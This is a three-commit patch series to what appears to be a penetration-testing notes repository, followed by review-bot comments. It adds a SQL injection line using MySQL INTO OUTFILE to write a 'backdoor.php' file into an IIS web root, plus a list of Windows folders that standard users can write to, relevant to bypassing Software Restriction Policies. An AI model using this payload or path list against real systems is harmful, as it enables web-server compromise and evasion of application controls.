From b63fd93e55ae2f81cccc534903c2383bcaa73669 Mon Sep 17 00:00:00 2001 From: Pierre ROSENZWEIG Date: Mon, 20 Jan 2020 23:46:12 +0100 Subject: [PATCH 1/3] add Windows writable folders & SQL RCE --- General/Shells.md | 6 ++++++ Windows/1-Overview.md | 19 +++++++++++++++++++ 2 files changed, 25 insertions(+) diff --git a/General/Shells.md b/General/Shells.md index 309872d..cb32745 100644 --- a/General/Shells.md +++ b/General/Shells.md @@ -846,6 +846,12 @@ Injection: Verified! Press [Enter] to continue... ``` +###### SQL Databases +RCE upload through SQL injection in a Windows Web server +``` +'; select "" INTO OUTFILE 'C:/Inetpub/wwwroot/backdoor.php';# +``` + ###### Ebowla ### WinRM diff --git a/Windows/1-Overview.md b/Windows/1-Overview.md index 923bc2b..95b7df8 100644 --- a/Windows/1-Overview.md +++ b/Windows/1-Overview.md @@ -26,3 +26,22 @@ Releases: | 6.2 | 9200 | Windows 8
Windows Server 2012 | | **6.3** | **9600** | Windows 8.1
**Windows Server 2012 R2** | | **10.0** | 10240 (TH1) / 10586 (TH2)
14393 (RS1) / 15063 (RS2) / 16299 (RS3) / 17134 (RS4) / 17763 (RS5) | Windows 10
Windows Server 2016 | + +-------------------------------------------------------------------------------- +### SRP: Protecting Windows Folder in Windows 10 (Software Restriction Policies) +``` +C:\Windows\tracing +C:\Windows\Registration\CRMLog +C:\Windows\System32\FxsTmp +C:\Windows\System32\com\dmp +C:\Windows\System32\spool\PRINTERS +C:\Windows\System32\spool\SERVERS +C:\Windows\System32\drivers\color +C:\Windows\System32\Tasks +C:\Windows\SysWOW64\FxsTmp +C:\Windows\SysWOW64\com\dmp +C:\Windows\SysWOW64\Tasks +C:\Windows\Tasks +C:\Windows\Temp +``` +Source : https://malwaretips.com/threads/srp-protecting-windows-folder-in-windows-10.80283/ From 76acf031728f3b4bc6c6c9069d9428ab0ab7735e Mon Sep 17 00:00:00 2001 From: Pierre ROSENZWEIG Date: Mon, 20 Jan 2020 23:51:39 +0100 Subject: [PATCH 2/3] Revert "add Windows writable folders & SQL RCE" This reverts commit b63fd93e55ae2f81cccc534903c2383bcaa73669. --- General/Shells.md | 6 ------ Windows/1-Overview.md | 19 ------------------- 2 files changed, 25 deletions(-) diff --git a/General/Shells.md b/General/Shells.md index cb32745..309872d 100644 --- a/General/Shells.md +++ b/General/Shells.md @@ -846,12 +846,6 @@ Injection: Verified! Press [Enter] to continue... ``` -###### SQL Databases -RCE upload through SQL injection in a Windows Web server -``` -'; select "" INTO OUTFILE 'C:/Inetpub/wwwroot/backdoor.php';# -``` - ###### Ebowla ### WinRM diff --git a/Windows/1-Overview.md b/Windows/1-Overview.md index 95b7df8..923bc2b 100644 --- a/Windows/1-Overview.md +++ b/Windows/1-Overview.md @@ -26,22 +26,3 @@ Releases: | 6.2 | 9200 | Windows 8
Windows Server 2012 | | **6.3** | **9600** | Windows 8.1
**Windows Server 2012 R2** | | **10.0** | 10240 (TH1) / 10586 (TH2)
14393 (RS1) / 15063 (RS2) / 16299 (RS3) / 17134 (RS4) / 17763 (RS5) | Windows 10
Windows Server 2016 | - --------------------------------------------------------------------------------- -### SRP: Protecting Windows Folder in Windows 10 (Software Restriction Policies) -``` -C:\Windows\tracing -C:\Windows\Registration\CRMLog -C:\Windows\System32\FxsTmp -C:\Windows\System32\com\dmp -C:\Windows\System32\spool\PRINTERS -C:\Windows\System32\spool\SERVERS -C:\Windows\System32\drivers\color -C:\Windows\System32\Tasks -C:\Windows\SysWOW64\FxsTmp -C:\Windows\SysWOW64\com\dmp -C:\Windows\SysWOW64\Tasks -C:\Windows\Tasks -C:\Windows\Temp -``` -Source : https://malwaretips.com/threads/srp-protecting-windows-folder-in-windows-10.80283/ From 30979ff474d8f2659f883871c411eec8496fd576 Mon Sep 17 00:00:00 2001 From: Pierre ROSENZWEIG Date: Tue, 21 Jan 2020 00:00:39 +0100 Subject: [PATCH 3/3] windows writable path & RCE through MySQL --- General/Shells.md | 5 +++++ Windows/1-Overview.md | 22 ++++++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/General/Shells.md b/General/Shells.md index 309872d..e5233b7 100644 --- a/General/Shells.md +++ b/General/Shells.md @@ -846,6 +846,11 @@ Injection: Verified! Press [Enter] to continue... ``` +###### SQL Database +RCE upload through a SQL injection on a Windows Web Server +``` +'; select "" INTO OUTFILE 'C:/Inetpub/wwwroot/backdoor.php';# +``` ###### Ebowla ### WinRM diff --git a/Windows/1-Overview.md b/Windows/1-Overview.md index 923bc2b..668bc2d 100644 --- a/Windows/1-Overview.md +++ b/Windows/1-Overview.md @@ -26,3 +26,25 @@ Releases: | 6.2 | 9200 | Windows 8
Windows Server 2012 | | **6.3** | **9600** | Windows 8.1
**Windows Server 2012 R2** | | **10.0** | 10240 (TH1) / 10586 (TH2)
14393 (RS1) / 15063 (RS2) / 16299 (RS3) / 17134 (RS4) / 17763 (RS5) | Windows 10
Windows Server 2016 | + +--------------------------------------------------------------------------------------------------------------------------- + +### SRP: Protecting Windows Folder in Windows 10 +List of Windows writable path : +``` +C:\Windows\tracing +C:\Windows\Registration\CRMLog +C:\Windows\System32\FxsTmp +C:\Windows\System32\com\dmp +C:\Windows\System32\spool\PRINTERS +C:\Windows\System32\spool\SERVERS +C:\Windows\System32\drivers\color +C:\Windows\System32\Tasks +C:\Windows\SysWOW64\FxsTmp +C:\Windows\SysWOW64\com\dmp +C:\Windows\SysWOW64\Tasks +C:\Windows\Tasks +C:\Windows\Temp +``` + +[Source](https://malwaretips.com/threads/srp-protecting-windows-folder-in-windows-10.80283/)
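Review bot: squash this series into a single commit. PATCH 2/3 reverts PATCH 1/3 in full and its message gives no reason, and PATCH 3/3 then re-adds the same two hunks with only wording changes (`###### SQL Database` instead of `###### SQL Databases`, an added `List of Windows writable path :` line, a Markdown link for the source). The add/revert pair leaves noise in the history of General/Shells.md and Windows/1-Overview.md without changing the end result.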
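Review bot: in PATCH 3/3, General/Shells.md, the new `###### SQL Database` entry names neither the DBMS nor the conditions it depends on. `INTO OUTFILE` is MySQL syntax (the commit subject says "RCE through MySQL"), and the statement only succeeds when the database account holds the FILE privilege and `secure_file_priv` permits the target directory. Rename the heading to MySQL and state those two conditions, so the entry also tells a reader which settings to check when hardening a server. The selected literal is `""` as written, so the line shows a file write rather than code execution and the "RCE upload" description should be worded accordingly. The hunk also drops the blank line before `###### Ebowla` that PATCH 1/3 had.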
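Review bot: in PATCH 3/3, Windows/1-Overview.md, the line `List of Windows writable path :` does not say who can write to these folders or how the list relates to the `### SRP: Protecting Windows Folder in Windows 10` heading directly above it. Suggest a sentence such as "Folders under C:\Windows that standard users can write to by default and that therefore need explicit SRP rules", change "path :" to "paths:", and keep the "(Software Restriction Policies)" expansion from PATCH 1/3, since nothing else in the hunk defines SRP. The list is taken from a single forum thread about Windows 10 while the table just above covers many builds, so add a note that the folder permissions should be re-checked on the build in question.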